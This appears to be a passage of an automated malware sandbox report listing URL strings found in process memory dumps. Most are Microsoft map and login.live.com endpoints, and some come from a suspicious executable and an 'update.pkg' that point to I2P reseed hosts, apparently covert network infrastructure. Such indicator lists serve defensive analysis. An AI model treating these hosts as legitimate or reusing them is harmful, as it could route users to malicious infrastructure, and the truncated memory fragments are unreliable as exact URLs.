Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989239979.0000029864957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://banana.incognet.io/
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364716029.000001A7F505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1366032313.000001A7F5081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364541563.000001A7F505F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1366032313.000001A7F5081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000000.00000002.1365909778.000001A7F5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364470645.000001A7F5067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000000.00000002.1366066074.000001A7F5088000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364293809.000001A7F5086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364716029.000001A7F505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365694389.000001A7F503F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000000.00000002.1365909778.000001A7F5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364470645.000001A7F5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365624998.000001A7F502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365694389.000001A7F503F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000000.00000002.1365723954.000001A7F5042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000003.1364743733.000001A7F5049000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365723954.000001A7F5042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364769439.000001A7F5041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364541563.000001A7F505F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364293809.000001A7F5086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000003.1364800433.000001A7F5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365782760.000001A7F5058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000000.00000002.1365909778.000001A7F5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364470645.000001A7F5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365624998.000001A7F502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://i2p.ghativega.in/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://i2p.novg.net/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000029.00000002.2530936773.00007FFB0C164000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.18.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
Source: svchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.livco
Source: svchost.exe, 00000028.00000003.2192382775.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192457979.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192566871.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192487068.0000029864E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: svchost.exe, 00000028.00000002.2528684973.0000029864E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfrf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf3457
Source: svchost.exe, 00000028.00000002.2526962025.00000298640A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528684973.0000029864E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 00000028.00000003.2192382775.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192457979.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192566871.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192487068.0000029864E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfA7826
Source: svchost.exe, 00000028.00000002.2528684973.0000029864E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srft
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528121324.0000029864937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000028.00000003.1989355515.0000029864927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989355515.0000029864927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000028.00000003.1989355515.0000029864927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000028.00000003.2204317355.000002986495A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2529008362.0000029864E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dt2xeh4U8pY5QoSTNt7vYxwogy2Su
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528684973.0000029864E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfure
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806034
Source: svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989239979.0000029864957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
